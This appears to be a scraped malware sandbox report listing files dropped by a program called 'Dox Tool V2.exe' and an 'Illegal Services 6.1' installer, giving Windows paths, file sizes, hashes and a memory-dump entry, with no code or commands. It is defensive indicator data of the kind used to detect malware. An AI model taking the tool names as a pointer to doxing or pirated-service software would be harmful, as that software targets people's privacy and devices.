bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe

Filesize
180KB

MD5
3075fc835b4f3b7b20dfee9ecc5dfaa0

SHA1
6cf171b5372ebad3adfafeeb6afa0b57b88dd9af

SHA256
81fdaf72bc2de5cdef33f74d867092172c40a5c1fe86c3313f9fcd0a0c22eac8

SHA512
41f81a88bab647ba079b5ee176213c392b172e73459396d18e249a8acd80b416d2bb8679b3a97cce9fd63ee18aadf0f9a552770f1de4685efb736114403f53e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\IB_U_Z_Z_A_R_Dl\Illegal Services 6.1\install\707E587\IS.Setup.msi

Filesize
3.0MB

MD5
3255708b6cb705fe525f8b9fcc8b939a

SHA1
d3dec4db2c07e82c636e7c2b20f08accf2e6489c

SHA256
ff3e5b0baad11d798c2152eb01cdcf68775c123ac07f72cffb53b623ac9a71c5

SHA512
205bd7957a161c4c42ed2ce778378cfa81215a92a947f5ebca9327681cca60aa47ff5167a6afee8a49f1cc853c30bdf90f912e131d25891ef8fa1f34463e2b90

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD37A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6b69a229ed4de5c4c70f2262dc285723

SHA1
b7518c5f41e70af976540e7f2aab0d5e0d0879e1

SHA256
edb1922e9186eafde09aa6228427bd6335d90a242ffe66d5b5e06378ed8fbd91

SHA512
d8f30d395354a74cef79088a5d59a38d24fbd88fd3d519564c6a380ad137743d2f75e43282c6b79b6cfbd48d771cb2d2be3cc6bac37e566bb5db67b0d82c80e5

Download Submit
\Users\Admin\AppData\Local\Temp\IB_U_Z_Z_A_R_Dl\Illegal Services 6.1\install\decoder.dll

Filesize
205KB

MD5
912135871892d0b2685c3dc816e469a7

SHA1
193a30fb66b0d43fa3e372a503781cb9d9502c0b

SHA256
d4282c9805e7ff97a7bebcbbed608d7daa3dc4c72354690ba94b685550728549

SHA512
0b6936c036b033c3a3dc646dcb52163ceec9558ed9d679cef5e454b4e907c893c6ee2549c8e957ecd9bb70ed4b26e8f36cba69a39c0f80e197e656decf23c393

Download Submit
\Users\Admin\AppData\Local\Temp\IS.Setup.exe

Filesize
17.5MB

MD5
f48ca4a6e5457dbb41d8de929da88c7c

SHA1
2908ae49cdaa4489ed80f25b8096bd79fb77ee42

SHA256
84dab96a11da002f640ba371f218c49fc3c13d192b9ffbae63cea45bf572ef2d

SHA512
a46e8e2fa8bb5f8f1c4158546c11c4b531047706ef4eb45bb288096d02d3d6212f4d92a13fb3d6402296256947558c470433ebcc9068f0a5712f9070e39b1bdd

Download Submit
\Users\Admin\AppData\Local\Temp\MSID572.tmp

Filesize
436KB

MD5
475d20c0ea477a35660e3f67ecf0a1df

SHA1
67340739f51e1134ae8f0ffc5ae9dd710e8e3a08

SHA256
426e6cf199a8268e8a7763ec3a4dd7add982b28c51d89ebea90ca792cbae14dd

SHA512
99525aaab2ab608134b5d66b5313e7fc3c2e2877395c5c171897d7a6c66efb26b606de1a4cb01118c2738ea4b6542e4eb4983e631231b3f340bf85e509a9589e

Download Submit
memory/2812-24-0x00000000003E0000-0x0000000000412000-memory.dmp

Filesize
200KB

Download